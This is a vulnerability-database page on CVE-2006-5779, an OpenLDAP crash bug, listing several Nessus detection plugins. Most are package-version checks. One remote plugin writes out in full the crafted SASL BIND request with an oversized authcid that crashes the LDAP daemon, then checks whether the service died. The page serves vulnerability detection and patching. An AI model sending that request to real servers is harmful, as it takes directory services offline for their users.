Vulnerabilities > CVE-2006-5779 - Reachable Assertion vulnerability in multiple products

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
HIGH
network
low complexity
openldap
canonical
CWE-617
nessus

Summary

OpenLDAP before 2.3.29 allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.

Common Weakness Enumeration (CWE)

Nessus

  • NASL familySuSE Local Security Checks
    NASL idSUSE_SA_2006_072.NASL
    descriptionThe remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client). OpenLDAP libldap
    last seen2019-10-28
    modified2007-02-18
    plugin id24449
    published2007-02-18
    reporterThis script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/24449
    titleSUSE-SA:2006:072: openldap2-client
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:072
    #
    
    
    if ( ! defined_func("bn_random") ) exit(0);
    
    include("compat.inc");
    
    if(description)
    {
     script_id(24449);
     script_version ("1.9");
     
     name["english"] = "SUSE-SA:2006:072: openldap2-client";
     
     script_name(english:name["english"]);
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote host is missing a vendor-supplied security patch" );
     script_set_attribute(attribute:"description", value:
    "The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client).
    
    
    OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to  cause an affected application (especially the
    OpenLDAP Server) to crash.
    
    This is tracked by the Mitre CVE ID CVE-2006-5779." );
     script_set_attribute(attribute:"solution", value:
    "http://www.novell.com/linux/security/advisories/2006_72_openldap2.html" );
     script_set_attribute(attribute:"risk_factor", value:"High" );
    
    
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/18");
     script_end_attributes();
    
     
     summary["english"] = "Check for the version of the openldap2-client package";
     script_summary(english:summary["english"]);
     
     script_category(ACT_GATHER_INFO);
     
     script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
     family["english"] = "SuSE Local Security Checks";
     script_family(english:family["english"]);
     
     script_dependencies("ssh_get_info.nasl");
     script_require_keys("Host/SuSE/rpm-list");
     exit(0);
    }
    
    include("rpm.inc");
    if ( rpm_check( reference:"openldap2-client-2.2.27-6.4", release:"SUSE10.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"openldap2-client-2.2.23-6.6", release:"SUSE9.3") )
    {
     security_hole(0);
     exit(0);
    }
    
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-384-1.NASL
    descriptionEvgeny Legerov discovered that the OpenLDAP libraries did not correctly truncate authcid names. This situation would trigger an assert and abort the program using the libraries. A remote attacker could send specially crafted bind requests that would lead to an LDAP server denial of service. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id27967
    published2007-11-10
    reporterUbuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/27967
    titleUbuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-384-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(27967);
      script_version("1.15");
      script_cvs_date("Date: 2019/08/02 13:33:01");
    
      script_cve_id("CVE-2006-5779");
      script_bugtraq_id(20939);
      script_xref(name:"USN", value:"384-1");
    
      script_name(english:"Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Evgeny Legerov discovered that the OpenLDAP libraries did not
    correctly truncate authcid names. This situation would trigger an
    assert and abort the program using the libraries. A remote attacker
    could send specially crafted bind requests that would lead to an LDAP
    server denial of service.
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://usn.ubuntu.com/384-1/"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected ldap-utils, libldap-2.2-7 and / or slapd packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:ldap-utils");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libldap-2.2-7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:slapd");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:5.10");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.06:-:lts");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.10");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/10");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Ubuntu Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    if (! ereg(pattern:"^(5\.10|6\.06|6\.10)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 5.10 / 6.06 / 6.10", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    flag = 0;
    
    if (ubuntu_check(osver:"5.10", pkgname:"ldap-utils", pkgver:"2.2.26-3ubuntu0.2")) flag++;
    if (ubuntu_check(osver:"5.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-3ubuntu0.2")) flag++;
    if (ubuntu_check(osver:"5.10", pkgname:"slapd", pkgver:"2.2.26-3ubuntu0.2")) flag++;
    if (ubuntu_check(osver:"6.06", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu2.2")) flag++;
    if (ubuntu_check(osver:"6.06", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu2.2")) flag++;
    if (ubuntu_check(osver:"6.06", pkgname:"slapd", pkgver:"2.2.26-5ubuntu2.2")) flag++;
    if (ubuntu_check(osver:"6.10", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu3.1")) flag++;
    if (ubuntu_check(osver:"6.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu3.1")) flag++;
    if (ubuntu_check(osver:"6.10", pkgname:"slapd", pkgver:"2.2.26-5ubuntu3.1")) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_WARNING,
        extra      : ubuntu_report_get()
      );
      exit(0);
    }
    else
    {
      tested = ubuntu_pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ldap-utils / libldap-2.2-7 / slapd");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_OPENLDAP2-CLIENT-2282.NASL
    descriptionOpenLDAP libldap
    last seen2020-06-01
    modified2020-06-02
    plugin id27364
    published2007-10-17
    reporterThis script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/27364
    titleopenSUSE 10 Security Update : openldap2-client (openldap2-client-2282)
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update openldap2-client-2282.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(27364);
      script_version ("1.12");
      script_cvs_date("Date: 2019/10/25 13:36:28");
    
      script_cve_id("CVE-2006-5779");
    
      script_name(english:"openSUSE 10 Security Update : openldap2-client (openldap2-client-2282)");
      script_summary(english:"Check for the openldap2-client-2282 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to cause an affected application (especially the
    OpenLDAP Server) to crash (CVE-2006-5779)."
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected openldap2-client packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client-32bit");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:10.1");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/17");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    if (release !~ "^(SUSE10\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "10.1", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    flag = 0;
    
    if ( rpm_check(release:"SUSE10.1", reference:"openldap2-client-2.3.19-18.11") ) flag++;
    if ( rpm_check(release:"SUSE10.1", cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11") ) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openldap2-client / openldap2-client-32bit");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE9_11307.NASL
    descriptionOpenLDAP libldap
    last seen2020-06-01
    modified2020-06-02
    plugin id41106
    published2009-09-24
    reporterThis script is Copyright (C) 2009-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/41106
    titleSuSE9 Security Update : openldap2-client (YOU Patch Number 11307)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The text description of this plugin is (C) Novell, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(41106);
      script_version("1.6");
      script_cvs_date("Date: 2019/10/25 13:36:28");
    
      script_cve_id("CVE-2006-5779");
    
      script_name(english:"SuSE9 Security Update : openldap2-client (YOU Patch Number 11307)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SuSE 9 host is missing a security-related patch."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to cause an affected application (especially the
    OpenLDAP Server) to crash. (CVE-2006-5779)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://support.novell.com/security/cve/CVE-2006-5779.html"
      );
      script_set_attribute(attribute:"solution", value:"Apply YOU patch number 11307.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/22");
      script_set_attribute(attribute:"plugin_publication_date", value:"2009/09/24");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
    if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
    if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
    if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 9 on the '"+cpu+"' architecture have not been implemented.");
    
    
    flag = 0;
    if (rpm_check(release:"SUSE9", reference:"openldap2-client-2.2.24-4.22")) flag++;
    if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"openldap2-client-32bit-9-200611171828")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else exit(0, "The host is not affected.");
    
  • NASL familyDenial of Service
    NASL idOPENLDAP_SASL_BIND_DOS.NASL
    descriptionThe remote host appears to be running OpenLDAP, an open source LDAP directory implementation. The version of OpenLDAP installed on the remote host fails to handle malformed SASL bind requests. An unauthenticated attacker can leverage this issue to crash the LDAP server on the affected host.
    last seen2020-06-01
    modified2020-06-02
    plugin id23625
    published2006-11-07
    reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/23625
    titleOpenLDAP SASL authcid Name BIND Request DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    if (description) {
      script_id(23625);
      script_version("1.19");
    
      script_cve_id("CVE-2006-5779");
      script_bugtraq_id(20939);
    
      script_name(english:"OpenLDAP SASL authcid Name BIND Request DoS");
      script_summary(english:"Tries to crash OpenLDAP");
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote LDAP server is prone to a denial of service attack." );
     script_set_attribute(attribute:"description", value:
    "The remote host appears to be running OpenLDAP, an open source LDAP
    directory implementation. 
    
    The version of OpenLDAP installed on the remote host fails to handle
    malformed SASL bind requests.  An unauthenticated attacker can
    leverage this issue to crash the LDAP server on the affected host." );
     script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/450728/30/0/threaded" );
      # http://www.openldap.org/its/index.cgi/Archive.Software%20Bugs?id=4740;expression=authcid%20Name%20BIND%20Request;selectid=4740;usearchives=1
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9daf484d" );
     script_set_attribute(attribute:"see_also", value:"http://www.openldap.org/software/release/changes.html" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to OpenLDAP 2.3.29 or later." );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/07");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/06");
     script_cvs_date("Date: 2018/11/15 20:50:21");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe",value:"cpe:/a:openldap:openldap");
    script_end_attributes();
    
     
      script_category(ACT_DENIAL);
      script_family(english:"Denial of Service");
      script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
      script_dependencies("ldap_detect.nasl");
      script_require_ports("Services/ldap", 389);
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("byte_func.inc");
    include("misc_func.inc");
    
    
    port = get_service(svc:"ldap", default: 389, exit_on_fail: 1);
    
    
    soc = open_sock_tcp(port);
    if (!soc) exit(0);
    
    
    id = rand() % 1024;
    
    set_byte_order(BYTE_ORDER_BIG_ENDIAN);
    req_bind1 =
      mkbyte(0x30) +                       # universal sequence
      mkbyte(0x17) +                       # length of the request
      mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random)
      mkbyte(0x60) +                       # bind request
        mkbyte(0x11) +                     #   length of request
        mkbyte(2) +                        #   version (3)
          mkbyte(1) + mkbyte(3) +
        mkbyte(4) +                        #   authentication (SASL)
          mkbyte(0) +
          mkbyte(0xa3) +
          mkbyte(10) +
          mkbyte(4) + mkbyte(8) + "CRAM-MD5";
    send(socket:soc, data:req_bind1);
    res = recv(socket:soc, length:1024);
    
    # If...
    if (
      # the response is long enough and..
      strlen(res) > 5 &&
      # it looks like an LDAP message and...
      getbyte(blob:res, pos:0) == 0x30 &&
      # it's a response to our request.
      (mkword(id) + mkbyte(0x61)) >< res
    )
    {
      # Try to kill the server.
      id = id - 1;
      req_bind2 =
        mkbyte(0x30) +                     # universal sequence
        mkbyte(0x82) + mkword(0x041f) +    # length of the request
        mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random)
        mkbyte(0x60) +                     # bind request
          mkbyte(0x82) + mkword(0x0417) +  #   length of request
          mkbyte(2) +                      #  version (3)
            mkbyte(1) + mkbyte(3) + 
          mkbyte(4) +                        #   authentication (SASL)
          mkbyte(0) +
          mkbyte(0xa3) +
            mkbyte(0x82) + mkword(0x040e) + 
          mkbyte(4) + mkbyte(8) + "CRAM-MD5" + 
          mkbyte(4) + mkbyte(0x82) + mkword(0x0400) + crap(data:" ", length:1024);
      send(socket:soc, data:req_bind2);
      res = recv(socket:soc, length:1024);
      close(soc);
    
      # If we didn't get a response, try to open another connection.
      if (strlen(res) == 0)
      {
        sleep(1);
        if (service_is_dead(port: port) > 0)
        {
          security_warning(port);
          exit(0);
        }
      }
    }
    
  • NASL familyMandriva Local Security Checks
    NASL idMANDRAKE_MDKSA-2006-208.NASL
    descriptionAn unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id24593
    published2007-02-18
    reporterThis script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/24593
    titleMandrake Linux Security Advisory : openldap (MDKSA-2006:208)
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Mandrake Linux Security Advisory MDKSA-2006:208. 
    # The text itself is copyright (C) Mandriva S.A.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(24593);
      script_version ("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:48");
    
      script_cve_id("CVE-2006-5779");
      script_bugtraq_id(20939);
      script_xref(name:"MDKSA", value:"2006:208");
    
      script_name(english:"Mandrake Linux Security Advisory : openldap (MDKSA-2006:208)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Mandrake Linux host is missing one or more security
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An unspecified vulnerability in OpenLDAP allows remote attackers to
    cause a denial of service (daemon crash) via a certain combination of
    SASL Bind requests that triggers an assertion failure in libldap.
    
    Packages have been patched to correct this issue."
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-static-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-static-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-clients");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-servers");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/18");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Mandriva Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
    if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-clients-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-doc-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-servers-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-clients-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-doc-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-servers-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-200611-25.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-200611-25 (OpenLDAP: Denial of Service vulnerability) Evgeny Legerov has discovered that the truncation of an incoming authcid longer than 255 characters and ending with a space as the 255th character will lead to an improperly computed name length. This will trigger an assert in the libldap code. Impact : By sending a BIND request with a specially crafted authcid parameter to an OpenLDAP service, a remote attacker can cause the service to crash. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id23747
    published2006-11-30
    reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/23747
    titleGLSA-200611-25 : OpenLDAP: Denial of Service vulnerability
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200611-25.
    #
    # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(23747);
      script_version("1.13");
      script_cvs_date("Date: 2019/08/02 13:32:43");
    
      script_cve_id("CVE-2006-5779");
      script_xref(name:"GLSA", value:"200611-25");
    
      script_name(english:"GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200611-25
    (OpenLDAP: Denial of Service vulnerability)
    
        Evgeny Legerov has discovered that the truncation of an incoming
        authcid longer than 255 characters and ending with a space as the 255th
        character will lead to an improperly computed name length. This will
        trigger an assert in the libldap code.
      
    Impact :
    
        By sending a BIND request with a specially crafted authcid parameter to
        an OpenLDAP service, a remote attacker can cause the service to crash.
      
    Workaround :
    
        There is no known workaround at this time."
      );
